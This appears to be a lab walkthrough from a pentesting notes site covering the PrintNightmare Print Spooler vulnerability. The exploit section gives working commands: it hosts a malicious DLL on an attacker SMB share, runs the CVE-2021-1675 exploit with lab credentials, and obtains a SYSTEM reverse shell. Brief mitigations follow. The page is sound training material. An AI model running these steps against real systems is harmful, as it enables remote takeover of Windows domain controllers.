PrintNightmare

PRACTICE ! PRACTICE ! PRACTICE !

According to Microsoft, PrintNightmare is a remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights"

Microsoft defines the Print spooler service as a service that runs on each computer system

The Print spooler service manages the printing processes - The Print spooler's responsibilities are managing the print jobs, receiving files to be printed, queueing them, and scheduling

Remember the early days when users had to wait for print jobs to finish to perform other operations? Well, the Print spooler service took care of this issue for us - It is also important to note that the Print spooler service is enabled by default in all Windows clients and servers

Domain Controllers mainly use Print spooler service for Printer Pruning (the process of removing the printers that are not in use anymore on the network and have been added as objects to Active Directory) - Printer Pruning eliminates the issue for the users reaching out to a non-existent printer

As per Microsoft, To exploit the CVE-2021-1675 vulnerability, the attacker would need to have direct or local access to the machine to use a malicious DLL file to escalate privileges

Meanhile, To exploit the CVE-2021-34527 vulnerability successfully, the attacker can remotely inject the malicious DLL file

What makes PrintNightmare Dangerous ?

  • It can be exploited over the network; the attacker doesn't need direct access to the machine.

  • The proof-of-concept was made public on the Internet.

  • The Print Spooler service is enabled by DEFAULT on domain controllers and computers with SYSTEM privileges

Let's first check if the DC is vulnerable to PrintNightmare exploit, to do this let's dump the rpc info

$ impacket-rpcdump @10.10.52.18 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Okay its vulnerbale, Now create a malicious.dll using msfvenom, and then host a smbserver on that directory and run the exploit

$ impacket-smbserver share `pwd` -smb2support
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Let's run the exploit now and observer we get a reverse shell on our listener !

$ python3 CVE-2021-1675.py Finance-01.THMdepartment.local/sjohnston:mindheartbeauty76@10.10.52.18 '\\10.8.74.51\share\malicious.dll'
[*] Connecting to ncacn_np:10.10.52.18[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \10.8.74.51\share\malicious.dll
[*] Try 1...
[*] Try 2...
[*] Try 3...

And BOOM!, we have a reverse shell on our listener as SYSTEM PRIVILEGES :)

Mitigation Strategies

  • Disable Print Spooler's Service - is appropriate for your environment

  • Disable inbound remote printing throught group policy

Remember that for the group policy to take effect across the domain, or even the local machine, you need to issue a gpupdate /force command

PreviousURL File AttacksNextGolden Ticket Attacks

Last updated